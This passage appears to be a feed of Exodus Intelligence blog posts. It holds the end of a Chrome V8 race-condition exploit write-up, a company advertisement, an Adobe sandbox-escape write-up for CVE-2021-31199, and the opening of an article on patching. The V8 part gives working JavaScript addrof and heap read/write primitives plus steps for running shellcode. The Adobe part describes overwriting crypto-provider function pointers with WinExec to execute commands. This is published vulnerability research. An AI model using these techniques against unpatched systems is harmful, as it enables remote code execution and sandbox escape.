  • Finally at [5], the objarr array is traversed in order to find the changed marker and the index marker_idx is saved. This index and leak_obj are used to craft exploit primitives within the V8 heap.

Exploit Primitives

The following sections are common to most V8 exploits and are easily accessible from other write-ups. We describe these exploit primitives to explain the caveat of having to deal with the fact that the spray might have resulted in the objects being unaligned in memory.

Address of an Object

				
					function v8h_addrof(obj) {

[1]

  leak_obj.a = obj;
  leak_obj.b = obj;

  let aux_ab = new ArrayBuffer(8);
  let aux_i32_arr = new Uint32Array(aux_ab); 
  let aux_f64_arr = new Float64Array(aux_ab);

[2]

  aux_f64_arr[0] = cor_farr[marker_idx - 1];

[3]

  if (aux_i32_arr[0] != aux_i32_arr[1]) {
    aux_i32_arr[0] = aux_i32_arr[1]
  }  

  let res = BigInt(aux_i32_arr[0]);

  return res;
}
				
			

The above code presents the addrof primitive and consists of the following steps:

  • First, at [1], the target object to leak is placed within the properties a and b of leak_obj and auxiliary array views are created in order to read from the corrupted array cor_farr.
  • At [2], the properties are read from the corrupted array by subtracting one from the marker_idx. This is due to the leak_obj having the properties next to each other in memory; therefore a and b precede the findme property.
  • By checking the upper and lower 32-bits of the read float value at [3], it is possible to tell whether the a and b values are aligned. In case they are not, it means that only the higher 32-bits of the float value contains the address of the target object. By assigning it back to the index 0 of the aux_i32_arr, the function is simplified and it is possible to just return the leaked value by always reading from the same index.

Reading and Writing on the V8 Heap

Depending on the architecture and whether pointer compression is enabled (default on 64-bit architectures), there will be situations where it is needed to read either just a 32-bit tagged pointer (e.g. an object) or a full 64-bit address. The latter case only applies to 64-bit architectures due to the need of manipulating the backing store of a Typed Array as it will be needed to build an arbitrary read and write primitive outside of the V8 heap boundaries.

Below we only present the 64-bit architecture read/write. Their 32-bit counterparts do the same, but with the restriction of reading the lower or higher 32-bit values of the leaked 64-bit float value.

				
					function v8h_read64(v8h_addr_as_bigint) {
  let ret_value = null;
  let restore_value = null;
  let aux_ab = new ArrayBuffer(8);
  let aux_i32_arr = new Uint32Array(aux_ab); 
  let aux_f64_arr = new Float64Array(aux_ab);
  let aux_bint_arr = new BigUint64Array(aux_ab);

[1]

  aux_f64_arr[0] = cor_farr[marker_idx];
  let high = aux_i32_arr[0] == 0x44444444;

[2]

  if (high) {
    restore_value = aux_f64_arr[0];
    aux_i32_arr[1] = Number(v8h_addr_as_bigint-4n);
    cor_farr[marker_idx] = aux_f64_arr[0];
  } else {
    aux_f64_arr[0] = cor_farr[marker_idx+1];
    restore_value = aux_f64_arr[0];
    aux_i32_arr[0] = Number(v8h_addr_as_bigint-4n);
    cor_farr[marker_idx+1] = aux_f64_arr[0];
  }

[3]

  aux_f64_arr[0] = leak_obj.floatprop;
  ret_value = aux_bint_arr[0];
  cor_farr[high ? marker_idx : marker_idx+1] = restore_value;
  return ret_value;
}
				
			

The 64-bit architecture read consists of the following steps:

  • At [1], a check for alignment is done via the marker_idx: if the marker is found in the lower 32-bit value via aux_i32_arr[0], it means that the leak_obj.floatprop property is in the upper 32-bit (aux_i32_arr[1]).
  • Once alignment has been determined, next at [2] the address of the leak_obj.floatprop property is overwritten with the desired address provided by the argument v8h_addr_as_bigint. In addition, 4 bytes are subtracted from the target address because V8 will add 4 with the intention of skipping the map pointer to read the float value.
  • At [3], the leak_obj.floatprop points to the target address in the V8 heap. By reading it through the property, it is possible to obtain 64-bit values as floats and make the conversion with the auxiliary arrays.

This function can also be used to write 64-bit values by adding a value to write as an extra argument and, instead of reading the property, writing to it.

				
					function v8h_write64(what_as_bigint, v8h_addr_as_bigint) {

[TRUNCATED]

    aux_bint_arr[0] = what_as_bigint;
    leak_obj.floatprop = aux_f64_arr[0];

[TRUNCATED]
				
			

As mentioned at the beginning of this section, the only changes required to make these primitives work on 32-bit architectures are to use the provided auxiliary 32-bit array views such as aux_i32_arr and only write or read on the upper or lower 32-bit, as the following snippet shows:

				
					[TRUNCATED]

    aux_f64_arr[0] = leak_obj.floatprop;
    ret_value = aux_i32_arr[0];

[TRUNCATED]
				
			

Using the Exploit Primitives to Run Shellcode

The following steps to run custom shellcode on 64-bit architectures are public knowledge, but are summarized here for the sake of completion:

  1. Create a wasm module that exports a function (eg: main).
  2. Create a wasm instance object WebAssembly.Instance.
  3. Obtain the address of the wasm instance using the addrof primitive
  4. Read the 64bit pointer within the V8 heap at the wasm instance plus 0x68. This will retrieve the pointer to a rwx page where we can write our shellcode to.
  5. Now create a Typed Array of Uint8Array type.
  6. Obtain its address via the addrof function.
  7. Write the previously obtained pointer to the rwx page into the backing store of the Uint8Array, located 0x28 bytes from the Uint8Array address obtained in step 6.
  8. Write your desired shellcode into the Uint8Array one byte at a time. This will effectively write into the rwx page.
  9. Finally, call the main function exported in step 1.

Conclusion

This vulnerability was made possible by a Feb 2021 commit that introduced direct heap reads for JSArrayRef, allowing for the retrieval of a handle. Furthermore, this bug would have flown under the radar if not for another commit in 2018 that introduced measures to crash when double references are held during shift operation on arrays. This vulnerability was patched in June 2021 by disabling left-trimming when concurrent compilation jobs are being executed

The commits and their timeline show that it is not easy for developers to write secure code in a single go, especially in complex environments like JavaScript engines that also include fully-fledged optimizing compilers running concurrently.

We hope you enjoyed reading this. If you are hungry for more, make sure to check our other blog posts.

References

Turbofan definition – https://web.archive.org/web/20210325140355/https://v8.dev/blog/turbofan-jit

Orinoco – GC – https://web.archive.org/web/20210421220936/https://v8.dev/blog/trash-talk

V8 Object representation – http://web.archive.org/web/20210203161224/https://www.jayconrod.com/posts/52/a-tour-of-v8–object-representation

EcmaScript – https://web.archive.org/web/20201126065600/http://www.ecma-international.org/ecma-262/5.1/ECMA-262.pdf

TypedArrays in JS – https://web.archive.org/web/20201115103318/https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray

ArrayShift – https://web.archive.org/web/20210523042109/https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/shift

ArrayPush – https://web.archive.org/web/20210523042046/https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/push

Elements Kind – https://web.archive.org/web/20210319122800/https://source.chromium.org/chromium/v8/v8.git/+/5db4a28ef75f893e85b7f505f5528cc39e9deef5:src/objects/elements-kind.h;l=31

https://web.archive.org/web/20210321104253/https://v8.dev/blog/elements-kinds

Fast properties – https://web.archive.org/web/20210326133458/https://v8.dev/blog/fast-properties

Pointer Compression in V8 – https://web.archive.org/web/20230512101949/https://v8.dev/blog/pointer-compression

About Exodus Intelligence

Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with proprietary knowledge before the adversaries find them. We also conduct N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Google Chrome V8 ArrayShift Race Condition Remote Code Execution appeared first on Exodus Intelligence.

Why Choose Exodus Intelligence for Enhanced Vulnerability Management? 

16 May 2023 at 14:00

In the contemporary digital landscape, vulnerability management teams and analysts are overwhelmed by countless alerts, data streams, and patch recommendations. The sheer volume of information is daunting and frequently misleading. Ideally, the systems generating these alerts should streamline and prioritize the information. While AI systems and products are not yet mature enough to effectively filter out the noise, the solution still lies with humans—particularly, the experts who can accurately identify what’s critical and advise where to concentrate limited resources.  That’s where Exodus Intelligence comes in. Exodus focuses on investigating the vulnerabilities that matter, helping teams to reduce efforts on unnecessary alerting while focusing attention on critical and immediate areas of concern. 

 EXPERTISE IN (UN)EXPLOITABILITY 

 The threat landscape is diverse, ranging from payloads and malware to exploits and vulnerabilities. At Exodus, we target the root of the issue—the vulnerabilities. However, not just any vulnerability catches our attention. We dedicate our expertise to uncovering, analyzing, and documenting the most critical vulnerabilities within realistic, enterprise-level products that are genuinely exploitable. This emphasis on exploitability is intentional and pivotal. The intelligence we offer guides our customers towards becoming UN-EXPLOITABLE. 

 UNRIVALED TALENT POOL 

Exodus has fostered a culture over more than a decade that attracts and nurtures white hat hackers. We employ some of the world’s most advanced reverse engineers to conduct research for our customers, providing them with actionable intelligence and leading-edge insights to harden their network. Our relentless efforts are geared towards staying at the forefront of leading techniques and skills essential to outpace the world’s most advanced adversaries. Understanding and defending against a hacker necessitates a hacker’s mindset and skill set, which is precisely what we employ and offer. 

 RESPECTED INDUSTRY STANDING 

 Our team has won pwn2own competitions, authored books, and trained the most advanced teams worldwide. Our expertise and research have been relied upon by the United States and allied nations’ agencies for years, establishing a global reputation for us as one of the most advanced, mature, and reputable teams in this field. 

 PRECISE DETECTION 

 Exodus researchers dedicate weeks or even months to delve deep into the code to discover unknown vulnerabilities and analyze known (patched) vulnerability root causes. Our researchers develop an in-depth understanding of every vulnerability we report, often surpassing the knowledge of the developers themselves. The mitigation and detection guidance we provide ensures the accurate detection and mitigation of vulnerabilities, eliminating false positives. We don’t merely attempt to catch the exploit; we actually do. 

 EXCEPTIONAL VALUE 

 We have a dedicated team of over 30 researchers from across the globe, focusing solely on vulnerability research. In many companies, professionals and security engineers tasked with managing vulnerabilities and threats often have to deal with tasks outside their core competency. Now, imagine leveraging the expertise and output of 30 researchers dedicated to vulnerability research, all for the price of ONE cybersecurity engineer. Need we say more?… 

 Become the next forward-thinking business to join our esteemed customer list by filling out this form:

ABOUT EXODUS INTELLIGENCE 

Exodus Intelligence detects the undetectable.  Exodus discovers, analyzes and proves N-Day and Zero-Day vulnerabilities in our secure lab and provides our research to credentialed customers through our secure portal or API.  

Exodus’ Zero-Day Subscription provides customers with critically exploitable vulnerability reports, unknown to the public, affecting widely used and relied upon software, hardware, and embedded devices.   

Exodus’ N-Day Subscription provides customers with analysis of critically exploitable vulnerability reports, known to the public, affecting widely used and relied upon software, hardware, and embedded devices.   

Customers gain access to a proprietary library of N-Day and Zero-Day vulnerability reports in addition to proof of concepts and highly enriched vulnerability intelligence packages. These Vulnerability Intelligence packages, unavailable anywhere else, enable customers to reduce their mean time to detect and mitigate critically exploitable vulnerabilities.  Exodus enables customers to focus resources on establishing defenses against the most serious threats to your enterprise for less than the cost of a single cybersecurity engineer. 

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post <strong>Why Choose Exodus Intelligence for Enhanced Vulnerability Management? </strong> appeared first on Exodus Intelligence.

Escaping Adobe Sandbox: Exploiting an Integer Overflow in Microsoft Windows Crypto Provider

6 April 2023 at 19:01

By Michele Campa

Overview

We describe a method to exploit a Windows Nday vulnerability to escape the Adobe sandbox. This vulnerability is assigned CVE-2021-31199 and it is present in multiple Windows 10 versions. The vulnerability is an out-of-bounds write due to an integer overflow in a Microsoft Cryptographic Provider library, rsaenh.dll.

Microsoft Cryptographic Provider is a set of libraries that implement common cryptographic algorithms. It contains the following libraries:
 
  • dssenh.dll  – Algorithms to exchange keys using Diffie-Hellman or to sign/verify data using DSA.
  • rsaenh.dll  – Algorithms to work with RSA.
  • basecsp.dll – Algorithms to work with smart cards.

These providers are abstracted away by API in the CryptSP.dll library, which acts as an interface that developers are expected to use. Each call to the API expects an HCRYPTPROV object as argument. Depending on certains fields in this object, CryptSP.dll redirects the code flow to the right provider. We will describe the HCRYPTPROV object in more detail when describing the exploitation of the vulnerability.

Cryptographic Provider Dispatch

Adobe Sandbox Broker Communication

 
Both Adobe Acrobat and Acrobat Reader run in Protected Mode by default. The protected mode is a feature that allows opening and displaying PDF files in a restricted process, a sandbox. The restricted process cannot access resources directly. Restrictions are imposed upon actions such as accessing the file system and spawning processes. A sandbox makes achieving arbitrary code execution on a compromised system harder.
 
Adobe Acrobat and Acrobat Reader use two processes when running in Protected Mode:
 
  • The Broker process, which provides limited and safe access to the sandboxed code.
  • The Sandboxed process, which processes and displays PDF files.
When the sandbox needs to execute actions that cannot be directly executed, it emits a request to the broker through a well defined IPC protocol. The broker services such requests only after ensuring that they satisfy a configured policy.
Sandbox and Broker

Sandbox Broker Communication Design

 
The communication between broker and sandbox happens via a shared memory that acts like a message channel. It informs the other side that a message is ready to be processed or that a message has been processed and the response is ready to be read.
 
On startup the broker initializes a shared memory of size 2MB and initializes the event handlers. Both, the event handlers and the shared memory are duplicated and written into the sandbox process via WriteProcessMemory().
 
When the sandbox needs to access a resource, it prepares the message in the shared memory and emits a signal to inform the broker. On the other side, once the broker receives the signal it starts processing the message and emits a signal to the sandbox when the message processing is complete.
Communication between Sandbox and Broker
The elements involved in the Sandbox-Broker communication are as follows:
 
  • Shared memory with RW permissions of size 2MB is created when the broker starts. It is mapped into the child process, i.e. the sandbox.
  • Signals and atomic instructions are used to synchronize access to the shared memory.
  • Multiple channels in the shared memory allow bi-directional communication by multiple threads simultaneously.
In summary, when the sandbox process cross-calls a broker-exposed resource, it locks the channel, serializes the request and pings the broker. Finally it waits for broker and reads the result.
 

Vulnerability

The vulnerability occurs in the rsaenh.dll:ImportOpaqueBlob() function when a crafted opaque key blob is imported. This routine is reached from the Crypto Provider interface by calling CryptSP:CryptImportKey() that leads to a call to the CPImportKey() function, which is exposed by the Crypto Provider.
				
					// rsaenh.dll

__int64 __fastcall CPImportKey(
        __int64 hcryptprov,
        char *key_to_imp,
        unsigned int key_len,
        __int64 HCRYPT_KEY_PUB,
        unsigned int flags,
        _QWORD *HCRYPT_KEY_OUT)
{

[Truncated]

  v7 = key_len;
  v9 = hcryptprov;
  *(_QWORD *)v116 = hcryptprov;
  NewKey = 1359;

[Truncated]

  v12 = 0i64;
  if ( key_len
    &amp;&amp; key_len = key_len )
  {
    if ( (unsigned int)VerifyStackAvailable() )
    {

[1]

      v13 = (unsigned int)(v7 + 8) + 15i64;
      if ( v13 = (unsigned int)v7 )
      {
        v39 = (char *)((__int64 (__fastcall *)(_QWORD))g_pfnAllocate)((unsigned int)(v7 + 8));
        v12 = v39;

[Truncated]

      }

[Truncated]

      goto LABEL_14;
    }

[Truncated]

LABEL_14:

[2]

  memcpy_0(v12, key_to_imp, v7);
  v15 = 1;
  v107 = 1;
  v9 = *(_QWORD *)v116;

[Truncated]

[3]

  v18 = NTLCheckList(v9, 0);
  v113 = (const void **)v18;

[Truncated]

[4]

  if ( v12[1] != 2 )
  {

[Truncated]

  }
  if ( v16 == 6 )
  {

[Truncated]

  }
  switch ( v16 )
  {
    case 1:

[Truncated]

    case 7:

[Truncated]

    case 8:

[Truncated]

    case 9:

[5]

      NewKey = ImportOpaqueBlob(v19, (uint8_t *)v12, v7, HCRYPT_KEY_OUT);
      if ( !NewKey )
        goto LABEL_30;
      v40 = WPP_GLOBAL_Control;
      if ( WPP_GLOBAL_Control == &amp;WPP_GLOBAL_Control || (*((_BYTE *)WPP_GLOBAL_Control + 28) &amp; 1) == 0 )
        goto LABEL_64;
      v41 = 210;
      goto LABEL_78;
    case 11:

[Truncated]

    case 12:

[Truncated]

    default:

[Truncated]

  }
}
				
			

Before reaching ImportOpaqueBlob() at [5], the key to import is allocated on the stack or on the heap according to the available stack space at [1]. The key to import is copied, at [2], into the new memory allocated; the public key struct version member is expected to be 2. The HCRYPTPROV object pointer is decrypted at [3], and then at [4] the key version is checked to be equal to 2. Finally a switch case on the type field of the key to import leads to executing ImportOpaqueBlob() at [5]. This occurs if and only if the type member is equal to OPAQUEKEYBLOB (0x9).

The OPAQUEKEYBLOB indicates that the key is a session key (as opposed to public/private keys).

				
					__int64 __fastcall ImportOpaqueBlob(__int64 a1, uint8_t *key_, unsigned int len_, unsigned __int64 *out_phkey)
{

[Truncated]

    *out_phkey = 0i64;
    v8 = 0xC0;

[6]

    if ( len_ = v18 )      // key + 0x10
        {
            if ( (_DWORD)v17 )
            {

[9]

                *((_QWORD *)v16 + 3) = v16 + 0xC8;
                memcpy_0(v16 + 0xC8, key_ + 0x70, v17);
            }

[Truncated]

    }
    else
    {

[Truncated]

    }
      if ( v16 )
        FreeNewKey(v16);
      return v10;
    }

[Truncated]

  return v10;
}
				
			

In order to reach the vulnerable code, it is required that the key to import has more than 0x70 bytes [6]. The vulnerability occurs due to an integer overflow that happens at [7] due to a lack of checking the values at addresses (unsigned int)((uint8_t*)key + 0x14) and (unsigned int)((uint8_t*)key + 0x10). For example if one of these members is set to 0xffffffff, an integer overflow occurs. The vulnerability is triggered when the memcpy() routine is called to copy (unsigned int)((uint8_t*)key + 0x10) bytes from key + 0x70 into v16 + 0xc8 at [9].

An example of an opaque blob that triggers the vulnerability is the following: if key + 0x10 is set to 0x120 and key + 0x14 equals 0xffffff00, then it leads to allocating 0x120 + 0xffffff00 + 0xc8 + 0x08 = 0xf0 bytes of buffer, into which 0x120 bytes are copied. The integer overflow allows bypassing a weak check, at [8], which requires the key length to be greater than: 0x120 + 0xffffff00 + 0x70 = 0x90.

Exploitation

The goal of exploiting this vulnerability is to escape the Adobe sandbox in order to execute arbitrary code on the system with the privileges of the broker process. It is assumed that code execution is already possible in the Adobe sandbox.

Exploit Strategy

The Adobe broker exposes cross-calls such as CryptImportKey() to the sandboxed process. The vulnerability can be triggered by importing a crafted key into the Crypto Provider Service, implemented in rsaenh.dll. The vulnerability yields an out-of-bounds write primitive in the broker, which can be easily used to corrupt function pointers. However, Adobe Reader enables a large number of security features including ASLR and Control Flow Guard (CFG), which effectively prevent ROP chains from being used directly to gain control of the execution flow.
 
The exploitation strategy described in this section involves bypassing CFG by abusing a certain design element of the Microsoft Crypto Provider. In particular, the interface that redirects code flow according to function pointers stored in the HCRYPTPROV object.
  

CryptSP – Context Object

HCRYPTPROV is the object instantiated and used by CryptSP.dll to dispatch calls to the right provider. It can be instantiated via the CryptAcquireContext() API, that returns an instantiated HCRYPTPROV object.

HCRYPTPROV is a basic C structure containing function pointers to the provider exposed routine. In this way, calling CryptSP.dll:CryptImportKey() executes HCRYPTPROV->FunctionPointer() that corresponds to provider.dll:CPImportKey().

The HCRYPTPROV data structure is shown below:

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    ----------------------------------------------
0x00        8                 CPAcquireContext          Function pointer exposed by Crypto Provider
0x08        8                 CPReleaseContext          Function pointer exposed by Crypto Provider
0x10        8                 CPGenKey                  Function pointer exposed by Crypto Provider
0x18        8                 CPDeriveKey               Function pointer exposed by Crypto Provider
0x20        8                 CPDestroyKey              Function pointer exposed by Crypto Provider
0x28        8                 CPSetKeyParam             Function pointer exposed by Crypto Provider
0x30        8                 CPGetKeyParam             Function pointer exposed by Crypto Provider
0x38        8                 CPExportKey               Function pointer exposed by Crypto Provider
0x40        8                 CPImportKey               Function pointer exposed by Crypto Provider
0x48        8                 CPEncrypt                 Function pointer exposed by Crypto Provider
0x50        8                 CPDecrypt                 Function pointer exposed by Crypto Provider
0x58        8                 CPCreateHash              Function pointer exposed by Crypto Provider
0x60        8                 CPHashData                Function pointer exposed by Crypto Provider
0x68        8                 CPHashSessionKey          Function pointer exposed by Crypto Provider
0x70        8                 CPDestroyHash             Function pointer exposed by Crypto Provider
0x78        8                 CPSignHash                Function pointer exposed by Crypto Provider
0x80        8                 CPVerifySignature         Function pointer exposed by Crypto Provider
0x88        8                 CPGenRandom               Function pointer exposed by Crypto Provider
0x90        8                 CPGetUserKey              Function pointer exposed by Crypto Provider
0x98        8                 CPSetProvParam            Function pointer exposed by Crypto Provider
0xa0        8                 CPGetProvParam            Function pointer exposed by Crypto Provider
0xa8        8                 CPSetHashParam            Function pointer exposed by Crypto Provider
0xb0        8                 CPGetHashParam            Function pointer exposed by Crypto Provider
0xb8        8                 Unknown                   Unknown
0xc0        8                 CPDuplicateKey            Function pointer exposed by Crypto Provider
0xc8        8                 CPDuplicateHash           Function pointer exposed by Crypto Provider
0xd0        8                 Unknown                   Unknown
0xd8        8                 CryptoProviderHANDLE      Crypto Provider library base address
0xe0        8                 EncryptedCryptoProvObj    Crypto Provider object's encrypted pointer
0xe8        4                 Const Val                 Constant value set to 0x11111111
0xec        4                 Const Val                 Constant value set to 0x1
0xf0        4                 Const Val                 Constant value set to 0x1
				
			
CryptSP dispatch using HCRYPTPROV

When a CryptSP.dll API is invoked the HCRYPTPROV object is used to dispatch the flow to the right provider routine. At offset 0xe0 the HCRYPTPROV object contains the real provider object that is used internally in the provider routines. When CryptSP.dll dispatches the call to the provider it passes the real provider object contained at HCRYPTOPROV + 0xe0 as the first argument.

				
					// CryptSP.dll

BOOL __stdcall CryptImportKey(
        HCRYPTPROV hProv,
        const BYTE *pbData,
        DWORD dwDataLen,
        HCRYPTKEY hPubKey,
        DWORD dwFlags,
        HCRYPTKEY *phKey)
{

[Truncated]

[1]

    if ( (*(__int64 (__fastcall **)(_QWORD, const BYTE *, _QWORD, __int64, DWORD, HCRYPTKEY *))(hProv + 0x40))(
           *(_QWORD *)(hProv + 0xE0),
           pbData,
           dwDataLen,
           v13,
           dwFlags,
           phKey) )
    {
        if ( (dwFlags &amp; 8) == 0 )
        {
            v9[11] = *phKey;
            *phKey = (HCRYPTKEY)v9;
            v9[10] = hProv;
            *((_DWORD *)v9 + 24) = 572662306;
        }
        v8 = 1;
    }

[Truncated]

}
				
			

At [1], we see an example how CryptSP.dll dispatches the code to the provider:CPImportKey() routine.

Crypto Provider Abuse

The Crypto Providers’ interface uses the HCRYPTPROV object to redirect the execution flow to the right Crypto Provider API. When the interface redirects the execution flow it sets the encrypted pointer located at HCRYPTPROV + 0xe0 as the first argument. Therefore, by overwriting the function pointer and the encrypted pointer, an attacker can redirect the execution flow while controlling the first argument.

Adobe Acrobat – CryptGenRandom abuse to identify corrupted objects

The Adobe Acrobat broker provides the CryptGenRandom() cross-call to the sandbox. If the CPGenRandom() function pointer has been overwritten with a function having a predictable return value different from the return value of the original CryptGenRandom() function, then it is possible to determine that a HCRYPTPROV object has been overwritten.

For example, if a pointer to the absolute value function, ntdll!abs, is used to override the CPGenRandom() function pointer, the broker executes abs(HCRYPTPROV + 0xe0) instead of CPGenRandom(). Therefore, by setting a known value at HCRYPTPROV + 0xe0, this cross-call can be abused by an attacker to identify whether the HCRYPTPROV object has been overwritten by checking if its return value is abs(<known value>).

Adobe Acrobat – CryptReleaseContext abuse to execute commands

The Adobe Acrobat broker provides the CryptReleaseContext() cross-call to the sandbox. This cross-call ends up calling CPReleaseContext(HCRYPTPROV + 0xe0, 0). By overwriting the CPReleaseContext() function pointer in HCRYPTPROV with WinExec() and by overwriting HCRYPTPROV + 0xe0 with a previously corrupted HCRYPTPROV object, one can execute WinExec with an arbitrary lpCmdLine argument, thereby executing arbitrary commands.

Shared Memory Structure – overwriting contiguous HCRYPTPROV objects.

In the following we describe the shared memory structure and more specifically how arguments for cross-calls are stored. The layout of the shared memory structure is relevant when the integer overflow is used to overwrite the function pointers in contiguous HCRYPTPROV objects.

The share memory structure is shown below:

				
					Field                   Description
--------------------    --------------------------------------------------------------
Shared Memory Header    Contains main shared memory information like channel numbers.
Channel 0 Header        Contains main channel information like Event handles.
Channel 1 Header        Contains main channel information like Event handles.
...
Channel N Header        Contains main channel information like Event handles.
Channel 0               Channel memory zone, where the request/response is written.
Channel 1               Channel memory zone, where the request/response is written.
...
Channel N               Channel memory zone, where the request/response is written.
				
			

The shared memory main header is shown below:

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------------------------------
0x00           0x04           Channel number          Contains the number of channels available.
0x04           0x04           Unknown                 Unknown
0x08           0x08           Mutant HANDLE           Unknown
				
			

The channel main header data structure is shown below. The offsets are relative to the channel main header.

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------------------------------
0x00           0x08           Channel offset          Offset to the channel memory region for
                                                      storing/reading request relative to share
                                                      memory base address.
0x08           0x08           Channel state           Value representing the state of the channel:
                                                      1 Free, 2 in use by sandbox, 3 in use by broker.
0x10           0x08           Event Ping Handle       Event used by sandbox to signal broker that
                                                      there is a request in the channel.
0x18           0x08           Event Pong Handle       Event used by broker to signal sandbox that
                                                      there is a response in the channel.
0x20           0x08           Event Handle            Unknown
				
			

Since the shared memory is 2MB and the header is 0x10 bytes long and every channel header is 0x28 bytes long, every channel takes (2MB - 0x10 - N*0x28) / N bytes.

The shared memory channels are used to store the serialization of the cross-call input parameters and return values. Every channel memory region, located at shared_memory_address + channel_main_header[i].channel_offset, is implemented as the following data structure:

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -----------------------------------------------
0x00           0x04           Tag ID                  Tag ID is used by the broker to dispatch the
                                                      request to the exposed cross-call.
0x04           0x04           In Out                  Boolean, if set the broker copy-back in the
                                                      channel the content of the arguments after the
                                                      cross-call. It is used when parameters are
                                                      output parameters, e.g. GetCurrentDirectory().
0x08           0x08           Unknown                 Unknown
0x10           0x04           Error Code              Windows Last Error set by the broker after the
                                                      cross-call to inform sandbox about error status.
0x14           0x04           Status                  Broker sets to 1 if the cross-call has been
                                                      executed otherwise it sets to 0.
0x18           0x08           HANDLE                  Handle returned by the cross call
0x20           0x04           Return Code             Exposed cross-call return value.
0x24           0x3c           Unknown                 Unknown
0x60           0x04           Args Number             Number of argument present in the cross-call
                                                      emitted by the sandbox.
0x64           0x04           Unknown                 Unknown
0x68           Variable       Arguments               Data structure representing every argument
[ Truncated ]
				
			

At most 20 arguments can be set for a request but only the required arguments need to be specified. It means that if the cross-call requires two arguments then Args Number will be set to 2 and the Arguments data structure contains two elements of the Argument type. Every argument uses the following data structure:

				
					Offset     Length (bytes)    Field                   Description
---------  --------------    --------------------    --------------------------------------------------
0x0        4                 Argument type           Integer representing the argument type.
0x4        4                 Argument offset         Offset relative to the channel address, i.e. Tag
                                                     ID address, used to localize the argument value in the channel self
0x8        4                 Argument size           The argument's size.
				
			

Each of the argument data structures must be followed by another one that contains only the offset field filled with an offset greater than the last valid argument’s offset plus its own size, i.e argument[n].offset + argument[n].size + 1. Therefore, if a cross-call needs two arguments then three arguments must be set: two representing the valid arguments to pass to the cross-call and the third set to where the arguments end.

Shown below is an example of the arguments in a two-argument cross-call:

				
					Offset         Length (bytes)    Field
---------      --------------    --------------------
0x68           4                 Argument 0 type
0x6c           4                 Argument 0 offset
0x70           4                 Argument 0 size
0x74           4                 Argument 1 type
0x78           4                 Argument 1 offset
0x7c           4                 Argument 1 size
0x80           4                 Not Used
0x84           4                 Argument 1 offset + Argument 1 size + 1: 0x90 + N + M + 1
0x8c           4                 Not Used
0x90           N                 Argument 0 value
0x90 + N       M                 Argument 1 value
				
			
An Argument can be one of the following types:
				
					Argument type       Argument name         Description
--------------      ------------------    -------------------------------------------------------------
0x01                WCHAR String          Specify a wide string.
0x02                DWORD                 Specify an int 32 bits argument.
0x04                QWORD                 Specify an int 64 bits argument.
0x05                INPTR                 Specify an input pointer, already instantiated on the broker.
0x06                INOUTPTR              Specify an argument treated like a pointer in the cross-call
                                          handler. It is used as input or  output, i.e. return to the
                                          sandbox a broker valid memory pointer.
0x07                ASCII String          Specify an ascii string argument.
0x08                0x18 Bytes struct     Specify a structure long 0x18 bytes.
				
			

When an argument is of the INOUTPTR type (intended to be used for all non-primitive data types), then the cross-call handler treats it in the following way:

  1. Allocates 16 bytes where the first 8 bytes contain the argument size and the last 8 bytes the pointer received.
  2. If the argument is an input pointer for the final API then it is checked to be valid against a list of valid pointers before passing it as a parameter for the final API.
  3. If the argument is an output pointer for the final API then the pointer is allocated and filled by the final API.
  4. If the INOUT cross-call type is true then the pointer address is copied back to the sandbox.

Exploit Phases

The exploit consists of the following phases:

  1. Heap spraying – The sandbox process cross-calls CryptAcquireContext() N times in order to allocate multiple heap chunks of 0x100 bytes. The broker’s heap layout after the spray is shown below.
Broker heap layout after spray
  1. Abuse Adobe Acrobat design – Since the HCRYPTPTROV object is passed as a parameter to CryptAcquireContext() the pointer must be returned to the sandbox in order to allow using it for operations with Crypto Providers in the broker context. Because of this feature it is possible to find contiguous HCRYPTPROV objects.
  2. Holes creation – Releasing the contiguous chunks in an alternate way.
Creating holes in the broker process heap
  1. Import malicious key – The sandbox process cross-calls CryptImportKey() multiple times with a maliciously crafted key. It is expected that the key overflows into the next chunk, i.e. an HCRYPTPROV object. The overflow overwrites the initial bytes of the HCRYPTPROV object with a command string, CPGenRandom() with the address of ntdll!abs, and HCRYPTPROV + 0xe0 with a known value.
Overwriting the first HCRYPTPROV object
  1. Find overwritten object – The sandbox process cross-calls CryptGenRandom(). If it returns the known value then ntdll!abs() has been executed and the overwritten object has been found.
  2. Import malicious key – The sandbox process cross-calls CryptImportKey() multiple times with a maliciously crafted key. It is expected that the key overflows the next chunk, i.e. an HCRYPTPROV object. The overflow overwrites CPReleaseContext() with kernel32:WinExec(), CPGenRandom() with the address of ntdll!abs, and HCRYPTPROV + 0xe0 with the pointer to the object found in step 5.
Overwriting an HCRYPTPROV object a second time
  1. Find overwritten object – The sandbox process cross-calls CryptGenRandom(). If it returns the absolute value of the pointer found in step 5 then ntdll!abs() has been executed and the overwritten object has been found.
  2. Trigger – The sandbox process cross-calls CryptReleaseContext() on the HCRYPTPROV object found in step 7 to trigger WinExec().

Wrapping Up

We hope you enjoyed reading this. If you are hungry for more make sure to check our other blog posts.

The post Escaping Adobe Sandbox: Exploiting an Integer Overflow in Microsoft Windows Crypto Provider appeared first on Exodus Intelligence.

An Unpatched Vulnerability, A Substantial Liability

22 March 2023 at 11:00

An Unpatched Vulnerability, A Substantial Liability

Even the largest and most mature enterprises have trouble finding and patching vulnerabilities in a timely fashion. As we see in this article challenges include getting patches pushed through a sophisticated supply chain and ultimately to a system whose end user may have devices configured to not allow automated remote patch application. We see this play out with every product that contains a line of code, from the simplest programs to large SaaS platforms with stringent performance, scalability, and availability requirements: patches need to be implemented at the earliest opportunity in order to avert catastrophe.

